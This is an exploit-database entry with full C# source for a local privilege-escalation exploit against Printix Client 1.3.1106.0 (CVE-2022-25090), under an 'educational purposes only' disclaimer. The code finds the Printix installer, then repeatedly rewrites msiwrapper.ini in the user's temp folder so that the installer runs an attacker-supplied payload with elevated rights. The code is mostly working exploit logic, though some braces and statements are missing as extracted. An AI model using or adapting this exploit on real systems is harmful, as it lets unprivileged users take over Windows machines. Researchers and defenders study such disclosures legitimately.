Exploits / Vulnerability Discovered : 2022-03-09 |
Type : local |
Platform : windows
This exploit / vulnerability Printix client 1.3.1106.0 privilege escalation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
# Date: 3/2/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link:
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25090
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090
using System;
using System.Runtime.InteropServices;
using System.Drawing;
using System.Reflection;
using System.Threading;
using System.IO;
using System.Text;
using System.Resources;
using System.Diagnostics;
//Assembly COM for transparent creation of the application.
//End of Assembly COM For Transparent Creation usage.
public class Program
//Initiator class for the program, the program starts on the main method.
public static void Main(string[] args)
Console.ForegroundColor = ConsoleColor.Blue;
Console.WriteLine("├ oo dP dP ");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("├ 88 88 ");
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
Console.ForegroundColor = ConsoleColor.Blue;
Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 ");
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 ");
Console.ForegroundColor = ConsoleColor.Magenta;
Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' ");
Console.WriteLine("├ 88 ");
Console.WriteLine("├ dP ");
Console.ForegroundColor = ConsoleColor.Blue;
Console.Write("├ For ");
Console.ForegroundColor = ConsoleColor.Magenta;
Console.Write("Printix ");
Console.ForegroundColor = ConsoleColor.Blue;
Console.Write("Services Designed By Logan Latvala\n");
string filesH = "";
Console.WriteLine("Drag and drop a payload onto this application for execution.");
if (args[0]?.Length >0)
Console.WriteLine("File Added: " + args[0]);
catch (Exception e)
Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n We're going to look for your printix installer, one moment...");
string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
double mCheck = 1.00;
string trueInstaller = "";
//Starts to enumerate window's installer directory for an author with the name of printix.
foreach (string path in installerSearch)
Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
if (readFileProperties(path, "Printix"))
trueInstaller = path;
Console.WriteLine("We've found your installer, we'll finish enumeration.");
goto MGMA;
//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
if (trueInstaller == "")
Console.WriteLine("We can't find your installer, you are not vulnerable.");
Console.WriteLine("├ We are starting to enumerate your temporary directory.");
//Start a new thread here for enumeration.
Thread t = new Thread(() => newTempThread(filesH, args));
Console.WriteLine("All done.");
public static void newTempThread(string filesH, string[] args)
while (true)
//Starts the inheriting process for printix, in which scans for the files and relays their contents.
string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
if (!string.IsNullOrEmpty(files[0]))
foreach (string fl in files)
if (!filesH.Contains(fl))
//filesH += " " + fl;
string[] fileText = File.ReadAllLines(fl);
int linerc = 0;
foreach (string liners in fileText)
if (liners.Contains("SetupFileName"))
//Most likely the temporary directory for setup, which presents it properly.
Console.WriteLine("├ " + fl);
fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
Console.WriteLine("├ " + fileText[linerc] + "");
filesH += " " + fl;
File.WriteAllText(fl, string.Empty);
File.WriteAllLines(fl, fileText);
catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }